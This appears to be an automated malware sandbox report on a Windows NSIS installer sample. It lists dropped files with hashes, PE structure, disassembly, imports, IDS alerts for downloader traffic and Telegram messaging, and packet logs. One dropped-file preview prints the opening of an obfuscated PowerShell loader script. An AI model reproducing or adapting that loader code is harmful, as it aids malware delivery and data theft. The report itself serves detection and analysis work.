                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                        Malicious:true
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):489410
                                                                                                                        Entropy (8bit):1.2436305558399738
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:cU0VmvQia2T11QAJnUkKziB0gN0lQus3vm1YAzEYu:QVr4Z1QAJnUkKzK0gGlav67u
                                                                                                                        MD5:03ADD5EC69F2D821F4BDDF502603364B
                                                                                                                        SHA1:CEB941FCEF1D7D81F2BCC650E311A074B72D4DB0
                                                                                                                        SHA-256:A8850B76F116EB91305228F5F39B2B6152927531705DE707A60FC74B86DF4003
                                                                                                                        SHA-512:4B5864679A31EA4B0268A758B8179E14A1A682059B393834DE0260315BC0D086F1D98E944E0429304FFF518105226C5A9FD991050D98168059C34BCA1A677B2C
                                                                                                                        Malicious:false
                                                                                                                        Preview:...W............................................................H..p.........;..................C.................................w............................j.......?........ .+................................................................c........b......................7......................H....................".......................................IG+.......................y...................................x...................................L..................+............8...................................................................................o..[......................................1...........................s..............................................4.............8.................E...................................................................T..........................................H..............................W..........................H.....................X................8................................<...........K........................
                                                                                                                        Process:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        File Type:DIY-Thermocam raw data (Lepton 3.x), scale 42-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 34359738368.000000
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):359870
                                                                                                                        Entropy (8bit):1.2579154698125035
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:rJW+KJEK8CwPtS6DGm9KLLa+yoa6PQw3HNilLOurKGMTXU9NOXHeFG1jfERxHJ8i:iMCknb2N+S8kEqSe8PW7FZs4baLL
                                                                                                                        MD5:8A6A8A75FE9A08909B09C7242C1B0C73
                                                                                                                        SHA1:0EC96FBA81824408C7838638BDA73C6C1D055CFA
                                                                                                                        SHA-256:1AAD58A3F50A3EF4E50AFCECBAF81D840F4E3F0C512BCC5844A1AEC594A06FF7
                                                                                                                        SHA-512:4322DC485F01AD114244945AA63652B191E6BE6C5B4531678310C160AC8963A6FD30E3936747C9282C8EF147806324E99EE954929EB4F1568ADB71E8C89AD596
                                                                                                                        Malicious:false
                                                                                                                        Preview:....................................................p.................................................................!......................................Tm.......f.............................................X.................B.................j......................................................................t.....................u..........1............+..g....4.B.............................................................................].............Q......m.......................U.....................D..........................Y..y..........................................................t................................................$...............................................................................................................................X..........C....................................h.V...........E...............................................................................t.......................2...c..........................................
                                                                                                                        Process:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):284538
                                                                                                                        Entropy (8bit):7.751827834270769
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:+BfOXo2+1WevY1WQH8xXbBCjfwbec9uVDUGB+xNj0J2xxWPgOek+7di:+BfOXo2+1WszQ+bBCjobZs0Xj0J2XWPv
                                                                                                                        MD5:3EC09CE77D7046B1B0A4108EA6AAC00D
                                                                                                                        SHA1:85201F8D4EE3DC202574B7EE39AD232503A39EB2
                                                                                                                        SHA-256:1E5A50C09CA254DC572C08BC87F596EBF2AE2CCB09EF355BD34A1A7A2B4E1BEF
                                                                                                                        SHA-512:BD36A6120C32CCE182A44493AFDAEC571080CAB9668FB80EC84DBB3C55E0B50CF631DBA68617C29CD1AE9B9C61A6947DF157A558E110D0782D73B469AAADE39D
                                                                                                                        Malicious:false
                                                                                                                        Preview:........SS.......U............JJ.....{{{.....dd.....66..........................................................;;;..\.9999......~~.............99.....................,,.......................]]]]]].........<<<.............22.......yy.........................((((.hh...........z...........g............KK.......|.........y...>>...A.VVV...............VVV.]]......HH...........OO..........BB............ww...NNNN....................pp.........'.......mmmm................===.ddd.....................[....J...AA......|........................................X.0000..**....a.=.............1...y...6.....]...}}....@....Q.$$.........:....&&......XX...O..................{{....}.((......>>>............[..........................................>....................................!!.............OO.........rr............T........~........nnnn..............................................<......&&.......'''.............................................................C...!!.....%%%.....................2.
                                                                                                                        Process:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (4135), with CRLF, LF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):72197
                                                                                                                        Entropy (8bit):5.186143426077576
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:4JZdR4JoVHpJAKH7IGky9kgngX8ijAyIhWNjMlzOi:4JbR4YLbb0z8yIrzOi
                                                                                                                        MD5:7616CE045D0E4F80B84CA85F265F7588
                                                                                                                        SHA1:F85246DCD0A361746B9FA86A4A78F4424FDECDF8
                                                                                                                        SHA-256:3D5C18F1BC08FE7DB0AA8650C0342FF90D588AFD0B71B0091228860677ECC010
                                                                                                                        SHA-512:1B6CABF4063EB02503F2FFDECFD5318BE2BDE51E0B0F6B1CAEE7EA09525F4063D6D4231F0015A09985C83DB1729AD627C76F7FDF40807AB30883E4AD24B13A34
                                                                                                                        Malicious:true
                                                                                                                        Preview:$Tistykpakkes=$skaar;........$Fagblades = @'.Outdrin.Pericra$billedmCfantas,aCousinls AfliritKla.neri Chromal kederi Agib.uaO kestenGangliesT eoremkAphoris=Drm.esy$lavrockk etutteaUnsteadj g dsfoa Hov.dokmicroankOverfeaePt,rodan Uudtmm; Mephit.NitrosifAsses.au Overmon FeriascFlightytNannsloiEksamenoHov dvgnSniffed ForkramMrefluxtaStrygetkLnstigne op endf.oyalisijernba lPieridie StrygnsPatenta Sk gend(Absurdu$SpejderSGlede,eiNonexamdKrebaneeLokalnersagvoldoTamacoamRetningaButche g MashelnFeijoape Esophat StatesiA.ietatcPerorat,Numerat$ Pharm RSdekorniForaarsd AgtersdSporonie Ka,tusr Unl vesforhandl nkraoaU derreg skibsk)Inversf Achates{Peptoly.Vandmll.Prec rr$DriesbjN EffektoH ndelsn Blaserl gralsru SjlegacTirsdagrGaran iaRamletat PjatteiSteatomv LacewoeBasis gl frerhuy Uti.sl Sindalc(RiprapsA Hjrdisl p.edecdLight ieBuddingrBi,sletmGstgi eaUnvoracnBrevhem Sprawl,' ilvirkUKoftenfnIndo.ogdMakro aeS ateswrVeigleatCritica Kemofib$Stoa,eaNenkeltso alpingvKennarteIncurio rad oti Em.loysFo
                                                                                                                        Process:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):409643
                                                                                                                        Entropy (8bit):1.258117650984378
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:oK/xjE18JOxBR9iH6C0q2bSbck323mbP5cA:ooEOAxsxw222bRn
                                                                                                                        MD5:0B038FD9C23C723696185E52EBCCB874
                                                                                                                        SHA1:26F3EE8ABCC584DC46AB1AF5C6B1C26C3914F1A8
                                                                                                                        SHA-256:1E6B1012ABE05CD0B6409C6844E61C6314CF9EE5E04AF6E89352E09166C80B13
                                                                                                                        SHA-512:8BE9637A6195820DBD8BF6FDB6B35CD0499F007E36FB2B474D9120559473A98EB09CD622821821B16C7DFCE9D98EDDC61D647A61025C4CC36F451C88569E3100
                                                                                                                        Malicious:false
                                                                                                                        Preview:...tB...........*...............................T..........w....O.............r...#......].....m.......I.....................H..................................................................................}2.Wa..................&......u...............M................c.......................................................................i...................9..."...........y...u......b.....)........................................................................^...........................G.............g..................................................................:.....p........k..................1................:............U...........................................I................................................A.......^..............0....]..........+...............................................l.........k...................................................r....-.............................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):499434
                                                                                                                        Entropy (8bit):1.2603431949153356
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:fIH5W+q2nuI9Zg1tjaKFi1fc/si9MKqe79+cX2v4Jm:fIHJnZ9+Za/1fwr9FN
                                                                                                                        MD5:152C1126D35B77FC957526436ADBEA38
                                                                                                                        SHA1:A8B0E26555F1FAAB8ED05EAAF9DDE5DCA113572B
                                                                                                                        SHA-256:67780594962B62DD23C55340C9AB1CD11858C15F464E8EE312A690A1759EAFD3
                                                                                                                        SHA-512:A8BC5BE5A093095759D3ADB587B58B083DAD6FC9B942161D1A9F0B055E314C69506BAE2409E3D5E195068FB8BAE2C4F1EFFAD6A082276423F9989AF012A5A856
                                                                                                                        Malicious:false
                                                                                                                        Preview:................................I.....l........................k.......a.......................w....................=...................b.......................{.......+..............................=..................................h............. ......................&.g..........................#.........&..............E.........................................................................................................................................../.........j..{.........<....l......+...........4.........................................................?.................F....................~............~...................u..................P.................'....................................................................j.......................................................O..D............ ..................................V....................................................................8................S.......................................................\..
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.695013315037864
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:TjoY7n65om.exe
                                                                                                                        File size:825'542 bytes
                                                                                                                        MD5:6a5b8c6057dff681139fd609ffc6b21d
                                                                                                                        SHA1:b37b7a2168980b4772978a640ebf5a02f41697e6
                                                                                                                        SHA256:fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41
                                                                                                                        SHA512:0be9c3e2e42b53ac22237f9b2a1037ca4bb46ce908df0bdbe455eb1daf41457b6dd85f1d80aee36f47fa3c6d9cf9d3a9e8867928242edf8a93aae21aa703f989
                                                                                                                        SSDEEP:12288:wTJidkhIqHdLcMMEbtx0GA72BzYCqqykD0AarMhiNAgZY8i3oXRKQCzcdYSS:wTkQIwL81IBUCqpqrsfZV+ER/c
                                                                                                                        TLSH:6F051281BA40B6BEF757863C752681830AF3AD471480BAEB22D0F31F6577163D6077A5
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*.....
                                                                                                                        Icon Hash:07290d2d7979330f
                                                                                                                        Entrypoint:0x403359
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x5C157F1B [Sat Dec 15 22:24:27 2018 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                        Instruction
                                                                                                                        sub esp, 000002D4h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        push 00000020h
                                                                                                                        pop edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+14h], ebx
                                                                                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                        call dword ptr [004080A8h]
                                                                                                                        call dword ptr [004080A4h]
                                                                                                                        and eax, BFFFFFFFh
                                                                                                                        cmp ax, 00000006h
                                                                                                                        mov dword ptr [0042A20Ch], eax
                                                                                                                        je 00007F172113D143h
                                                                                                                        push ebx
                                                                                                                        call 00007F17211403F5h
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F172113D139h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        mov esi, 004082B0h
                                                                                                                        push esi
                                                                                                                        call 00007F172114036Fh
                                                                                                                        push esi
                                                                                                                        call dword ptr [00408150h]
                                                                                                                        lea esi, dword ptr [esi+eax+01h]
                                                                                                                        cmp byte ptr [esi], 00000000h
                                                                                                                        jne 00007F172113D11Ch
                                                                                                                        push 0000000Ah
                                                                                                                        call 00007F17211403C8h
                                                                                                                        push 00000008h
                                                                                                                        call 00007F17211403C1h
                                                                                                                        push 00000006h
                                                                                                                        mov dword ptr [0042A204h], eax
                                                                                                                        call 00007F17211403B5h
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F172113D141h
                                                                                                                        push 0000001Eh
                                                                                                                        call eax
                                                                                                                        test eax, eax
                                                                                                                        je 00007F172113D139h
                                                                                                                        or byte ptr [0042A20Fh], 00000040h
                                                                                                                        push ebp
                                                                                                                        call dword ptr [00408044h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [004082A0h]
                                                                                                                        mov dword ptr [0042A2D8h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                        push 000002B4h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 004216A8h
                                                                                                                        call dword ptr [00408188h]
                                                                                                                        push 0040A2C8h
                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x2cb90.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x62a50x64005814efda24a547f46f687d77de540309False0.6590234375data6.431421556070023IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x80000x13960x1400ef1be07ca8b096915258569fb3718a3cFalse0.453125data5.159710562612049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .ndata0x2b0000x320000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x5d0000x2cb900x2cc0029feacfb95f10d2c97620b954bab0c03False0.5635693086592178data5.592801421778874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_ICON0x5d4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.5097598485744707
                                                                                                                        RT_ICON0x6dc400xc828Device independent bitmap graphic, 128 x 256 x 24, image size 51200EnglishUnited States0.5580210772833724
                                                                                                                        RT_ICON0x7a4680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.6542276806802079
                                                                                                                        RT_ICON0x7e6900x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.585202492211838
                                                                                                                        RT_ICON0x818b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6878630705394191
                                                                                                                        RT_ICON0x83e600x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.5887404580152672
                                                                                                                        RT_ICON0x85b080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7556285178236398
                                                                                                                        RT_ICON0x86bb00xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.6117283950617284
                                                                                                                        RT_ICON0x878580x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.7889344262295082
                                                                                                                        RT_ICON0x881e00x748Device independent bitmap graphic, 24 x 48 x 24, image size 1824EnglishUnited States0.6357296137339056
                                                                                                                        RT_ICON0x889280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8608156028368794
                                                                                                                        RT_ICON0x88d900x368Device independent bitmap graphic, 16 x 32 x 24, image size 832EnglishUnited States0.658256880733945
                                                                                                                        RT_DIALOG0x890f80x120dataEnglishUnited States0.5104166666666666
                                                                                                                        RT_DIALOG0x892180x11cdataEnglishUnited States0.6056338028169014
                                                                                                                        RT_DIALOG0x893380xc4dataEnglishUnited States0.5918367346938775
                                                                                                                        RT_DIALOG0x894000x60dataEnglishUnited States0.7291666666666666
                                                                                                                        RT_GROUP_ICON0x894600xaedataEnglishUnited States0.6206896551724138
                                                                                                                        RT_VERSION0x895100x340dataEnglishUnited States0.4951923076923077
                                                                                                                        RT_MANIFEST0x898500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2025-01-11T00:41:13.947470+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049883142.250.181.238443TCP
                                                                                                                        2025-01-11T00:41:18.936105+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049918132.226.247.7380TCP
                                                                                                                        2025-01-11T00:41:20.107915+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049918132.226.247.7380TCP
                                                                                                                        2025-01-11T00:41:20.673469+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049931104.21.80.1443TCP
                                                                                                                        2025-01-11T00:41:21.404875+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049937132.226.247.7380TCP
                                                                                                                        2025-01-11T00:41:21.953171+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049943104.21.80.1443TCP
                                                                                                                        2025-01-11T00:41:23.274530+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049954104.21.80.1443TCP
                                                                                                                        2025-01-11T00:41:26.003606+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049974104.21.80.1443TCP
                                                                                                                        2025-01-11T00:41:28.646313+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1049984104.21.80.1443TCP
                                                                                                                        2025-01-11T00:41:30.912977+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1049987149.154.167.220443TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 11, 2025 00:41:12.844785929 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:12.844882965 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:12.845019102 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:12.869796991 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:12.869878054 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.501784086 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.501918077 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.502589941 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.502635956 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.645745993 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.645791054 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.646159887 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.646234035 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.648803949 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.695332050 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.947458029 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.947530031 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.947557926 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.947604895 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.947755098 CET49883443192.168.2.10142.250.181.238
                                                                                                                        Jan 11, 2025 00:41:13.947789907 CET44349883142.250.181.238192.168.2.10
                                                                                                                        Jan 11, 2025 00:41:13.947835922 CET49883443192.168.2.10142.250.181.238
